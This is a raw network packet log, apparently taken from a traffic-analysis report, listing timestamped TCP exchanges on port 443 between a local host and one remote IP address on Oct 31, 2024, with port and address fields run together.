                                                  Oct 31, 2024 20:50:38.669684887 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.674467087 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.674927950 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.674928904 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.674948931 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.675477982 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.675487995 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.675529957 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.675545931 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.676099062 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.676104069 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.691479921 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.691772938 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.692028999 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.692086935 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.692102909 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.692111969 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.692116976 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695338964 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695383072 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695458889 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695485115 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695656061 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695657969 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695671082 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695722103 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695758104 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695774078 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.695782900 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.695787907 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.698584080 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.698609114 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.698668957 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.698838949 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.698852062 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.805357933 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.805416107 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.805464983 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.805963993 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.806013107 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.806034088 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.806045055 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.806293964 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.806444883 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.806757927 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.806833029 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.806833029 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.806852102 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.806865931 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.808191061 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.808254004 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.808723927 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810091019 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810096025 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.810129881 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810132980 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.810405016 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810442924 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.810492039 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810507059 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.810525894 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810566902 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810879946 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.810890913 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.811261892 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.811275959 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.813005924 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.813060999 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.813157082 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.813328028 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.813349009 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.435636997 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.436069012 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.436089993 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.436640024 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.436645031 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.440864086 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.441256046 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.441272020 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.441662073 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.441665888 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.556479931 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.556986094 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.557013035 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.557382107 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.557387114 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.568252087 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.568494081 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.568722010 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.568834066 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.568834066 CET52349443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.568854094 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.568862915 CET4435234913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.571594000 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.571662903 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.571697950 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.571728945 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.571949959 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.571953058 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.572032928 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.572035074 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.572040081 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.572046041 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.572063923 CET52350443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.572068930 CET4435235013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.574321032 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.574354887 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.574493885 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.574671030 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.574696064 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.579622030 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.580518007 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.580518961 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.580533981 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.580554962 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.581028938 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.581783056 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.581783056 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.581794977 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.581829071 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.688507080 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.688627005 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.688796997 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.688832998 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.688832998 CET52352443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.688854933 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.688864946 CET4435235213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.691569090 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.691613913 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.691860914 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.691860914 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.691894054 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.714504004 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.714782953 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.714876890 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.714876890 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.715078115 CET52353443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.715092897 CET4435235313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.715981007 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.716198921 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.716376066 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.716419935 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.716419935 CET52351443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.716437101 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.716464043 CET4435235113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.718688011 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.718688965 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.718703985 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.718712091 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.719005108 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.719007969 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.719177008 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.719182968 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:39.719192982 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:39.719197035 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.322443008 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.323549032 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.323549032 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.323569059 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.323585987 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.328665018 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.328989029 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.329005957 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.329399109 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.329402924 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.451766968 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.451874971 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.452023029 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.452156067 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.452156067 CET52355443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.452177048 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.452186108 CET4435235513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.455213070 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.455252886 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.455486059 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.455486059 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.455518007 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.456538916 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.456967115 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.456990004 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.457432032 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.457437992 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.461426020 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.462261915 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.462261915 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.462285995 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.462315083 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.462482929 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.462533951 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.462701082 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.462701082 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.462753057 CET52354443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.462769032 CET4435235413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.464843035 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.464885950 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.464972973 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.465070963 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.465086937 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.470010042 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.470926046 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.470926046 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.470942974 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.470953941 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.593219042 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.593317986 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.593379021 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.593591928 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.593621969 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.593621969 CET52357443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.593642950 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.593655109 CET4435235713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.594083071 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.594151974 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.594261885 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.594263077 CET52356443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.594279051 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.594293118 CET4435235613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.596579075 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.596626043 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.596684933 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.596743107 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.596761942 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.596828938 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.596898079 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.596913099 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.596999884 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.597014904 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.601510048 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.601572037 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.601644039 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.601758957 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.601758957 CET52358443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.601769924 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.601783037 CET4435235813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.603948116 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.603965044 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:40.604017019 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.604167938 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:40.604180098 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.220984936 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.222080946 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.222110987 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.223098040 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.223104954 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.223879099 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.224201918 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.224229097 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.224838972 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.224844933 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.342173100 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.358105898 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.358258009 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.358315945 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.363006115 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.363080025 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.364609003 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.364666939 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.364725113 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.383131027 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.414385080 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.414470911 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.425502062 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.425515890 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.426594019 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.426599026 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.427277088 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.427282095 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.428133965 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.428137064 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.428500891 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.428534985 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.428550005 CET52359443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.428556919 CET4435235913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.431107998 CET52360443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.431132078 CET4435236013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.433815002 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.433823109 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.434813976 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.434818983 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.442498922 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.442563057 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.442666054 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.442980051 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.443011999 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.445393085 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.445419073 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.445511103 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.446291924 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.446305037 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.554063082 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.554136038 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.554202080 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.554467916 CET52363443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.554485083 CET4435236313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.557936907 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.558003902 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.558058023 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.559794903 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.559803009 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.559840918 CET52361443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.559845924 CET4435236113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.562541008 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.562602043 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.562716007 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.563280106 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.563308001 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.564414024 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.564438105 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.564533949 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.565037012 CET52367443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.565049887 CET4435236713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.739571095 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.739644051 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.739826918 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.740070105 CET52362443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.740088940 CET4435236213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.744167089 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.744218111 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:41.744272947 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.745182991 CET52368443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:41.745197058 CET4435236813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.185981989 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.187360048 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.187371969 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.187860012 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.187865973 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.209793091 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.210864067 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.210896015 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.212227106 CET52364443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.212241888 CET4435236413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.319020987 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.319739103 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.319761038 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.320575953 CET52366443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.320589066 CET4435236613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.322905064 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.322971106 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.323204994 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.323422909 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.323436975 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.323446035 CET52365443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:42.323451996 CET4435236513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:42.327693939 CET52369443192.168.2.413.107.246.60
